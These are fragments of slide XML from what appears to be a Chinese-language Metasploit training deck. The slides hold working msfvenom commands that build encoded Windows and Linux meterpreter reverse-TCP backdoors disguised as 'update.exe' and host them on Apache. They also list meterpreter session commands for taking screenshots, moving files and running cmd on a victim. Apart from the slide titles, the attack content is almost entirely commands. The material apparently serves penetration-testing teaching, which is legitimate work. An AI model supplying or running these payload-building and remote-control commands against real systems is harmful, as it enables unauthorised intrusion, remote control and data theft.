                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> &gt; screenshot</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上传文件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &gt; upload /root/passwords.txt  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C:/Windows/System32/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下载文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> &gt; download C:/Windows/System32/baxian.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> &gt; execute –s l –f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7172E7-2941-78EE-370A-4EBFBFC16DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="240359" y="1007793"/>
            <a:ext cx="10972800" cy="9310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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="18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65761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48832" y="1234833"/>
            <a:ext cx="10972800" cy="828430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>攻击监听</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3731D8F9-3BA0-A7A8-9133-4D41D0788E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520807" y="2063263"/>
            <a:ext cx="11150384" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.77.131 LPORT=8080 -f exe --platform windows --arch x86 -e x86/shikata_ga_nai -i 10 &gt; /var/www/html/update.exe </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94ABD349-732D-385A-061A-15971E2F7FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971649" y="3632923"/>
            <a:ext cx="10248699" cy="2862766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25979169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6EE05145-AD7E-E282-3439-65F664111F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="165098" y="799754"/>
            <a:ext cx="10515600" cy="1325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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>多种后门生成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC72FA27-86C6-92C2-2EB2-D23B1469D5CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165098" y="1916528"/>
            <a:ext cx="11988802" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>后门（使用两个编码器组合编码）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F496991B-14EE-D251-B509-CE5299ED4265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279398" y="5450322"/>
            <a:ext cx="9537700" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>后门，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PhP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>后门，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>后门，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>后门，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83CA133-C6D0-0FDD-D192-EC85CB4961B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165098" y="3695463"/>
            <a:ext cx="7991061"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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>后门（略）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD04874-6812-4885-429D-ACB611DDD9A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165098" y="4188230"/>
            <a:ext cx="12255502" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> -a x64 --platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> LHOST=192.168.77.128 LPORT=4444 -b "\x00" -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 10 -f elf -o /var/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xuegod.elf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5D99FA-4B53-2108-6DD8-EE4552DD9F73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279398" y="2439956"/>
            <a:ext cx="11849104" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.77.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22995271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8667020-97F7-F621-3260-D4BAEDCCD610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411259" y="982176"/>
            <a:ext cx="10655300" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>在 Kali 上启动 apache 为后门程序提供下载地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>root@xuegod53:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
